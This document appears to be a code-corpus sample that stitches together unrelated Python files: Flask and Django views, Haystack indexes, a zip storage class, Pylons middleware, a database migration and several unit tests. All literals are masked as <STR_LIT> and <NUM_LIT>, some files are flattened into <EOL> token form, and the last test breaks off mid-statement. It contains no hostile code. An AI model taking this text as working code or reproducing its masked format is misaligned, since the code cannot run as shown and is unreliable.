    app.add_url_rule('<STR_LIT>', view_func=UploadView.as_view('<STR_LIT>'))
    app.add_url_rule('<STR_LIT>', view_func=CreateView.as_view('<STR_LIT>'))
else:
    app.add_url_rule('<STR_LIT>', view_func=NoUploadOrCreate.as_view('<STR_LIT>'))
    app.add_url_rule('<STR_LIT>', view_func=NoUploadOrCreate.as_view('<STR_LIT>'))


@app.route('<STR_LIT>', methods=['<STR_LIT:GET>', '<STR_LIT:POST>'])
@app.route('<STR_LIT>', methods=['<STR_LIT:GET>', '<STR_LIT:POST>', '<STR_LIT>'])
def note(nid='<STR_LIT>'):
    # Minimal CRUD for notes: POST creates, DELETE removes, GET fetches.
    if current_user.is_anonymous():
        abort(<NUM_LIT>)
    elif request.method == '<STR_LIT:POST>':
        newnote = bibserver.dao.Note()
        newnote.data = request.json
        newnote.save()
        return redirect('<STR_LIT>' + newnote.id)
    elif request.method == '<STR_LIT>':
        note = bibserver.dao.Note.get(nid)
        note.delete()
        return redirect('<STR_LIT>')
    else:
        thenote = bibserver.dao.Note.get(nid)
        if thenote:
            resp = make_response(json.dumps(thenote.data, sort_keys=True, indent=<NUM_LIT:4>))
            resp.mimetype = "<STR_LIT:application/json>"
            return resp
        else:
            abort(<NUM_LIT>)


@app.route('<STR_LIT>', methods=['<STR_LIT:GET>', '<STR_LIT:POST>', '<STR_LIT>'])
def default(path):
    # Catch-all: delegate anything unmatched to the search front-end.
    import bibserver.search
    searcher = bibserver.search.Search(path=path, current_user=current_user)
    return searcher.find()


if __name__ == "<STR_LIT:__main__>":
    if config["<STR_LIT>"]:
        # Start the background ingest worker once, tracked via a pid file.
        bibserver.ingest.init()
        if not os.path.exists('<STR_LIT>'):
            ingest = subprocess.Popen(['<STR_LIT>', '<STR_LIT>'])
            open('<STR_LIT>', '<STR_LIT:w>').write('<STR_LIT:%s>' % ingest.pid)
    try:
        bibserver.dao.init_db()
        app.run(host='<STR_LIT>', debug=config['<STR_LIT>'], port=config['<STR_LIT:port>'])
    finally:
        # Clean up the ingest pid file on shutdown.
        if os.path.exists('<STR_LIT>'):
            os.remove('<STR_LIT>')
# Static, template-backed views for the job board pages; all rendering
# logic lives in the templates themselves.
from django.views.generic.base import TemplateView


class JobListView(TemplateView):
    # Renders the job-listing template; no extra context supplied.
    template_name = "<STR_LIT>"


class JobHelperView(TemplateView):
    # Renders the job-helper template; no extra context supplied.
    template_name = "<STR_LIT>"
# Haystack search-index declarations for press releases and press mentions.
from haystack import indexes
from .models import PressRelease, PressMention


class PressReleaseIndex(indexes.SearchIndex, indexes.Indexable):
    # Full document text is rendered from a search template (use_template=True).
    text = indexes.CharField(document=True, use_template=True)

    def get_model(self):
        # Model this index covers.
        return PressRelease

    def get_updated_field(self):
        # Model field haystack uses for incremental (updated-since) reindexing.
        return '<STR_LIT>'

    def index_queryset(self, using=None):
        # Only published objects are indexed.
        return self.get_model().published_objects.all()


class PressMentionIndex(indexes.SearchIndex, indexes.Indexable):
    text = indexes.CharField(document=True, use_template=True)
    # Extra searchable fields pulled straight off the model.
    publisher = indexes.CharField(model_attr='<STR_LIT>')
    url = indexes.CharField(model_attr='<STR_LIT:url>')

    def get_model(self):
        return PressMention

    def get_updated_field(self):
        return '<STR_LIT>'

    def index_queryset(self, using=None):
        return self.get_model().published_objects.all()
<s> from ofs . local . zipfile import ZipFile , BadZipfile , LargeZipFile , ZIP_STORED , ZIP_DEFLATED , is_zipfile <EOL> from ofs . base import BucketExists , OFSException , OFSInterface , OFSFileNotFound <EOL> from pairtree import ppath <EOL> import hashlib <EOL> from datetime import datetime <EOL> from tempfile import mkstemp <EOL> from uuid import uuid4 <EOL> import os <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> class NoSuchZipArchive ( OFSException ) : <EOL> pass <EOL> class BadZipArchive ( OFSException ) : <EOL> pass <EOL> MD_FILE = "<STR_LIT>" <EOL> class ZOFS ( OFSInterface ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , zipfile , mode = "<STR_LIT:r>" , compression = ZIP_STORED , allowZip64 = False , hashing_type = "<STR_LIT>" , quiet = False ) : <EOL> """<STR_LIT>""" <EOL> if mode not in ( "<STR_LIT:r>" , "<STR_LIT:w>" , "<STR_LIT:a>" ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if mode in ( "<STR_LIT:w>" , "<STR_LIT:a>" ) and not quiet : <EOL> print "<STR_LIT>" % mode <EOL> self . zipfile = zipfile <EOL> self . mode = mode <EOL> self . compression = compression <EOL> self . allowZip64 = allowZip64 <EOL> self . hashing_type = hashing_type <EOL> self . quiet = quiet <EOL> if mode == "<STR_LIT:r>" and not is_zipfile ( zipfile ) : <EOL> raise BadZipArchive , e <EOL> try : <EOL> self . z = ZipFile ( self . zipfile , self . mode , self . compression , self . allowZip64 ) <EOL> except BadZipfile , e : <EOL> print "<STR_LIT>" % zipfile <EOL> print "<STR_LIT>" % e <EOL> raise BadZipArchive , e <EOL> except LargeZipFile , e : <EOL> print "<STR_LIT>" <EOL> raise BadZipArchive , e <EOL> def _write ( self , z , bucket , label , stream ) : <EOL> name = self . _zf ( bucket , label ) <EOL> if self . hashing_type != None : <EOL> hash_gen = getattr ( hashlib , self . hashing_type ) ( ) <EOL> if hasattr ( stream , '<STR_LIT>' ) : <EOL> size = <NUM_LIT:0> <EOL> fd , filename = mkstemp ( ) <EOL> f = os . 
fdopen ( fd , "<STR_LIT:wb>" ) <EOL> chunk = stream . read ( <NUM_LIT> * <NUM_LIT> ) <EOL> while chunk : <EOL> f . write ( chunk ) <EOL> size = size + len ( chunk ) <EOL> if self . hashing_type != None : <EOL> hash_gen . update ( chunk ) <EOL> chunk = stream . read ( <NUM_LIT> * <NUM_LIT> ) <EOL> f . close ( ) <EOL> z . write ( filename , name ) <EOL> os . remove ( filename ) <EOL> else : <EOL> if self . hashing_type != None : <EOL> hash_gen . update ( stream ) <EOL> size = len ( stream ) <EOL> z . writestr ( name , stream ) <EOL> if self . hashing_type != None : <EOL> return size , '<STR_LIT>' % ( self . hashing_type , hash_gen . hexdigest ( ) ) <EOL> return size , "<STR_LIT>" <EOL> def __del__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . close ( ) <EOL> def close ( self ) : <EOL> self . z . close ( ) <EOL> def _zf ( self , bucket , label ) : <EOL> return "<STR_LIT:/>" . join ( ( ppath . id_encode ( bucket ) , label ) ) <EOL> def _nf ( self , name ) : <EOL> enc_bucket , label = name . split ( "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> return ( ppath . id_decode ( enc_bucket ) , label ) <EOL> def exists ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> fn = self . _zf ( bucket , label ) <EOL> try : <EOL> self . z . getinfo ( fn ) <EOL> return True <EOL> except KeyError : <EOL> return False <EOL> def claim_bucket ( self , bucket = None ) : <EOL> '''<STR_LIT>''' <EOL> if bucket : <EOL> return bucket <EOL> else : <EOL> return uuid4 ( ) . hex <EOL> def list_labels ( self , bucket ) : <EOL> '''<STR_LIT>''' <EOL> for name in self . z . namelist ( ) : <EOL> container , label = self . _nf ( name . encode ( "<STR_LIT:utf-8>" ) ) <EOL> if container == bucket and label != MD_FILE : <EOL> yield label <EOL> def list_buckets ( self ) : <EOL> '''<STR_LIT>''' <EOL> buckets = set ( ) <EOL> for name in self . z . namelist ( ) : <EOL> bucket , _ = self . _nf ( name ) <EOL> if bucket not in buckets : <EOL> buckets . 
add ( bucket ) <EOL> yield bucket <EOL> def get_stream ( self , bucket , label , as_stream = True ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode == "<STR_LIT:w>" : <EOL> raise OFSException , "<STR_LIT>" <EOL> elif self . exists ( bucket , label ) : <EOL> fn = self . _zf ( bucket , label ) <EOL> if as_stream : <EOL> return self . z . open ( fn ) <EOL> else : <EOL> return self . z . read ( fn ) <EOL> else : <EOL> raise OFSFileNotFound <EOL> def get_url ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> if self . exists ( bucket , label ) : <EOL> root = "<STR_LIT>" % os . path . abspath ( self . zipfile ) <EOL> fn = self . _zf ( bucket , label ) <EOL> return "<STR_LIT>" . join ( root , fn ) <EOL> else : <EOL> raise OFSFileNotFound <EOL> def put_stream ( self , bucket , label , stream_object , params = { } , replace = True , add_md = True ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode == "<STR_LIT:r>" : <EOL> raise OFSException , "<STR_LIT>" <EOL> else : <EOL> fn = self . _zf ( bucket , label ) <EOL> params [ '<STR_LIT>' ] = datetime . now ( ) . isoformat ( ) . split ( "<STR_LIT:.>" ) [ <NUM_LIT:0> ] <EOL> params [ '<STR_LIT>' ] = label <EOL> if self . exists ( bucket , label ) and replace == True : <EOL> zinfo = self . z . getinfo ( fn ) <EOL> size , chksum = self . _write ( self . z , bucket , label , stream_object ) <EOL> self . _del_stream ( zinfo ) <EOL> params [ '<STR_LIT>' ] = size <EOL> if chksum : <EOL> params [ '<STR_LIT>' ] = chksum <EOL> else : <EOL> size , chksum = self . _write ( self . z , bucket , label , stream_object ) <EOL> params [ '<STR_LIT>' ] = size <EOL> if chksum : <EOL> params [ '<STR_LIT>' ] = chksum <EOL> if add_md : <EOL> params = self . update_metadata ( bucket , label , params ) <EOL> return params <EOL> def _del_stream ( self , zinfo ) : <EOL> print "<STR_LIT>" <EOL> pass <EOL> def del_stream ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> if self . exists ( bucket , label ) : <EOL> name = self . 
_zf ( bucket , label ) <EOL> self . _del_stream ( name ) <EOL> def _get_bucket_md ( self , bucket ) : <EOL> name = self . _zf ( bucket , MD_FILE ) <EOL> if not self . exists ( bucket , MD_FILE ) : <EOL> raise OFSFileNotFound <EOL> if self . mode != "<STR_LIT:w>" : <EOL> json_doc = self . z . read ( name ) <EOL> try : <EOL> jsn = json . loads ( json_doc ) <EOL> return jsn <EOL> except ValueError : <EOL> raise OFSException , "<STR_LIT>" % bucket <EOL> else : <EOL> raise OFSException , "<STR_LIT>" <EOL> def get_metadata ( self , bucket , label ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode != "<STR_LIT:w>" : <EOL> try : <EOL> jsn = self . _get_bucket_md ( bucket ) <EOL> except OFSFileNotFound : <EOL> return { } <EOL> except OFSException , e : <EOL> raise OFSException , e <EOL> if jsn . has_key ( label ) : <EOL> return jsn [ label ] <EOL> else : <EOL> return { } <EOL> else : <EOL> raise OFSException , "<STR_LIT>" <EOL> def update_metadata ( self , bucket , label , params ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode != "<STR_LIT:r>" : <EOL> try : <EOL> payload = self . _get_bucket_md ( bucket ) <EOL> except OFSFileNotFound : <EOL> payload = { } <EOL> for l in self . list_labels ( bucket ) : <EOL> payload [ l ] = { } <EOL> payload [ l ] [ '<STR_LIT>' ] = l <EOL> if not self . quiet : <EOL> print "<STR_LIT>" % bucket <EOL> except OFSException , e : <EOL> raise OFSException , e <EOL> if not payload . has_key ( label ) : <EOL> payload [ label ] = { } <EOL> payload [ label ] . update ( params ) <EOL> self . put_stream ( bucket , MD_FILE , json . dumps ( payload ) , params = { } , replace = True , add_md = False ) <EOL> return payload [ label ] <EOL> else : <EOL> raise OFSException , "<STR_LIT>" <EOL> def del_metadata_keys ( self , bucket , label , keys ) : <EOL> '''<STR_LIT>''' <EOL> if self . mode != "<STR_LIT:r>" : <EOL> try : <EOL> payload = self . 
_get_bucket_md ( bucket ) <EOL> except OFSFileNotFound : <EOL> raise OFSFileNotFound , "<STR_LIT>" % bucket <EOL> except OFSException , e : <EOL> raise OFSException , e <EOL> if payload . has_key ( label ) : <EOL> for key in [ x for x in keys if payload [ label ] . has_key ( x ) ] : <EOL> del payload [ label ] [ key ] <EOL> self . put_stream ( bucket , MD_FILE , json . dumps ( payload ) , params = { } , replace = True , add_md = False ) <EOL> else : <EOL> raise OFSException , "<STR_LIT>" </s>
"""<STR_LIT>"""
from beaker.middleware import CacheMiddleware, SessionMiddleware
from paste.cascade import Cascade
from paste.registry import RegistryManager
from paste.urlparser import StaticURLParser
from paste.deploy.converters import asbool
from pylons import config
from pylons.middleware import ErrorHandler, StatusCodeRedirect
from pylons.wsgiapp import PylonsApp
from routes.middleware import RoutesMiddleware
from shakespeare.config.environment import load_environment


def make_app(global_conf, full_stack=True, static_files=True, **app_conf):
    """<STR_LIT>"""
    # Standard Pylons WSGI stack.  Order matters: each middleware wraps the
    # previous app, so the last layer added sees the request first.
    load_environment(global_conf, app_conf)
    app = PylonsApp()
    # Routing, session and cache layers.
    app = RoutesMiddleware(app, config['<STR_LIT>'])
    app = SessionMiddleware(app, config)
    app = CacheMiddleware(app, config)
    # Authentication (repoze.who) configured from the paste ini files.
    from repoze.who.config import make_middleware_with_config
    app = make_middleware_with_config(app, global_conf,
        app_conf['<STR_LIT>'], app_conf['<STR_LIT>'],
        app_conf['<STR_LIT>'])
    if asbool(full_stack):
        # Error handling; redirect the listed status codes to error pages.
        app = ErrorHandler(app, global_conf, **config['<STR_LIT>'])
        if asbool(config['<STR_LIT>']):
            app = StatusCodeRedirect(app)
        else:
            app = StatusCodeRedirect(app, [<NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>])
    app = RegistryManager(app)
    if asbool(static_files):
        # Try static files first, fall back to the dynamic app.
        static_app = StaticURLParser(config['<STR_LIT>']['<STR_LIT>'])
        app = Cascade([static_app, app])
    return app
# sqlalchemy-migrate script: move the material.src_* columns out into a new
# resource table (upgrade), and restore them (downgrade).
from sqlalchemy import *
from migrate import *
import migrate.changeset
from shakespeare.migration.util import wrap_in_transaction

# `migrate_engine` is injected into the module namespace by migrate's
# script-running machinery (via `from migrate import *`).
metadata = MetaData(migrate_engine)
material = Table('<STR_LIT>', metadata, autoload=True)
# Column objects for the columns being dropped from `material`
# (re-created on downgrade).
src_pkg = Column('<STR_LIT>', UnicodeText)
src_locator = Column('<STR_LIT>', UnicodeText)
resource_table = Table('<STR_LIT>', metadata,
    Column('<STR_LIT:id>', Integer, primary_key=True),
    Column('<STR_LIT>', Integer, ForeignKey('<STR_LIT>')),
    Column('<STR_LIT>', UnicodeText),
    Column('<STR_LIT>', UnicodeText),
    Column('<STR_LIT>', UnicodeText, default=u'<STR_LIT:url>'),
)


@wrap_in_transaction
def upgrade():
    # Create the new table first, then drop the superseded columns.
    resource_table.create()
    material.c['<STR_LIT>'].drop()
    material.c['<STR_LIT>'].drop()


@wrap_in_transaction
def downgrade():
    # Restore the original columns and remove the resource table.
    src_pkg.create(material)
    src_locator.create(material)
    resource_table.drop()
# Tests for the atom-feed work loader; requires external fixtures/services.
from shakespeare.tests import *
import shakespeare.model as model
import shakespeare.lib.feed as feed


class TestFeed:
    # Flag consumed by the test runner: marks tests needing external services.
    nose_external = True

    @classmethod
    def setup_class(self):
        TestData.make_fixture()

    @classmethod
    def teardown_class(self):
        TestData.remove_fixtures()

    def test_01_load_entry(self):
        # Build a minimal feedparser entry by hand and load it as a Work.
        import feedparser
        entry = feedparser.FeedParserDict()
        title = u'<STR_LIT>'
        name = title.strip()
        content = [{'<STR_LIT:value>': u'<STR_LIT>', '<STR_LIT>': '<STR_LIT>'}]
        entry.title = title
        entry.content = content
        loader = feed.WorkIntroductionLoader()
        work = loader.load_entry(entry)
        assert work.name == '<STR_LIT>', work
        model.Session.commit()
        model.Session.remove()
        # Re-fetch after commit to confirm the work actually persisted.
        work = model.Work.by_name(TestData.name)
        assert work.notes == content[<NUM_LIT:0>]['<STR_LIT:value>'], work.notes

    def _test_02_load_feed(self):
        '''<STR_LIT>'''
        # Disabled (leading underscore): exercises loading a whole feed
        # generated with webhelpers.feedgenerator.
        import webhelpers.feedgenerator as feedgenerator
        atomfeed = feedgenerator.Atom1Feed(
            title=u'<STR_LIT>',
            link=u'<STR_LIT>',
            description=u'<STR_LIT>',
            language=u'<STR_LIT>',
        )
        atomfeed.add_item(title='<STR_LIT>', link=u'<STR_LIT>',
            description='<STR_LIT>')
        feeddata = atomfeed.writeString('<STR_LIT:utf-8>')
        loader = feed.WorkIntroductionLoader()
        results = loader.load_feed(feeddata)
        assert len(results) == <NUM_LIT:1>, results
<s> from pitchfork . setup_application import create_app <EOL> from pitchfork . config import config <EOL> from datetime import datetime <EOL> from uuid import uuid4 <EOL> import unittest <EOL> import urlparse <EOL> import re <EOL> class PitchforkManageTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> check_db = re . search ( '<STR_LIT>' , config . MONGO_DATABASE ) <EOL> if not check_db : <EOL> test_db = '<STR_LIT>' % config . MONGO_DATABASE <EOL> else : <EOL> test_db = config . MONGO_DATABASE <EOL> self . pitchfork , self . db = create_app ( test_db ) <EOL> self . app = self . pitchfork . test_client ( ) <EOL> self . app . get ( '<STR_LIT:/>' ) <EOL> def tearDown ( self ) : <EOL> self . db . sessions . remove ( ) <EOL> self . db . settings . remove ( ) <EOL> self . db . api_settings . remove ( ) <EOL> self . db . history . remove ( ) <EOL> self . db . forms . remove ( ) <EOL> def setup_user_login ( self , session ) : <EOL> session [ '<STR_LIT:username>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT:email>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = True <EOL> session [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> def setup_admin_login ( self , session ) : <EOL> session [ '<STR_LIT:username>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT:email>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = True <EOL> session [ '<STR_LIT:name>' ] = '<STR_LIT>' <EOL> session [ '<STR_LIT>' ] = uuid4 ( ) . hex <EOL> def setup_useable_admin ( self ) : <EOL> self . db . settings . 
update ( <EOL> { } , { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> } <EOL> ) <EOL> def setup_useable_history ( self ) : <EOL> history = { <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : datetime . now ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:url>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT:data>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> } <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:body>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : <NUM_LIT> , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> '<STR_LIT>' : ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } , <EOL> '<STR_LIT:code>' : <NUM_LIT> <EOL> } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } <EOL> self . db . history . 
insert ( history ) <EOL> def setup_default_field ( self , form_name ) : <EOL> data = { <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:default>' : True , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT:label>' : '<STR_LIT:test>' , <EOL> '<STR_LIT>' : <NUM_LIT:5> <EOL> } <EOL> self . db . forms . update ( <EOL> { '<STR_LIT:name>' : form_name } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : data } } <EOL> ) <EOL> def retrieve_csrf_token ( self , data ) : <EOL> temp = re . search ( '<STR_LIT>' , data ) <EOL> if temp : <EOL> token = re . search ( '<STR_LIT>' , temp . group ( <NUM_LIT:1> ) ) <EOL> if token : <EOL> return token . group ( <NUM_LIT:1> ) <EOL> return '<STR_LIT>' <EOL> """<STR_LIT>""" <EOL> def test_pf_history ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_history_scrub ( self ) : <EOL> self . setup_useable_history ( ) <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> history = self . db . history . find_one ( { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> assert history , '<STR_LIT>' <EOL> def test_pf_history_scrub_no_history ( self ) : <EOL> with self . app as c : <EOL> with c . 
session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_favorites ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_manage_dcs_admin_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . _status_code == <NUM_LIT:200> , ( <EOL> '<STR_LIT>' % response . _status_code <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_manage_dcs_user_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_user_login ( sess ) <EOL> result = c . get ( '<STR_LIT>' ) <EOL> assert result . _status_code == <NUM_LIT> , ( <EOL> '<STR_LIT>' % result . _status_code <EOL> ) <EOL> request_path = urlparse . urlparse ( result . headers . get ( '<STR_LIT>' ) ) . path <EOL> self . assertEqual ( <EOL> request_path , <EOL> '<STR_LIT:/>' , <EOL> '<STR_LIT>' % request_path <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_manage_dcs_add ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . 
data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> found_add = self . db . api_settings . find_one ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> assert found_add , '<STR_LIT>' <EOL> def test_pf_manage_dcs_add_no_dcs ( self ) : <EOL> self . db . api_settings . update ( { } , { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:1> } } ) <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> found_add = self . db . api_settings . find_one ( <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> assert found_add , '<STR_LIT>' <EOL> def test_pf_manage_dcs_add_dupe ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> token = self . retrieve_csrf_token ( response . data ) <EOL> data = { <EOL> '<STR_LIT>' : token , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . 
data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> dcs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for dc in dcs : <EOL> if dc . get ( '<STR_LIT:name>' ) == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:1> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> def test_pf_manage_dcs_add_bad_data ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> data = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> response = c . post ( <EOL> '<STR_LIT>' , <EOL> data = data , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> def test_pf_manage_dcs_remove ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( <EOL> '<STR_LIT>' , <EOL> follow_redirects = True <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . data , <EOL> '<STR_LIT>' <EOL> ) <EOL> api_settings = self . db . api_settings . find_one ( ) <EOL> dcs = api_settings . get ( '<STR_LIT>' ) <EOL> count = <NUM_LIT:0> <EOL> for dc in dcs : <EOL> if dc . get ( '<STR_LIT:name>' ) == '<STR_LIT>' : <EOL> count += <NUM_LIT:1> <EOL> self . assertEquals ( <EOL> count , <EOL> <NUM_LIT:0> , <EOL> '<STR_LIT>' % count <EOL> ) <EOL> """<STR_LIT>""" <EOL> def test_pf_verbs_admin_perms ( self ) : <EOL> with self . app as c : <EOL> with c . session_transaction ( ) as sess : <EOL> self . setup_admin_login ( sess ) <EOL> response = c . get ( '<STR_LIT>' ) <EOL> assert response . _status_code == <NUM_LIT:200> , ( <EOL> '<STR_LIT>' % response . _status_code <EOL> ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' , <EOL> response . 
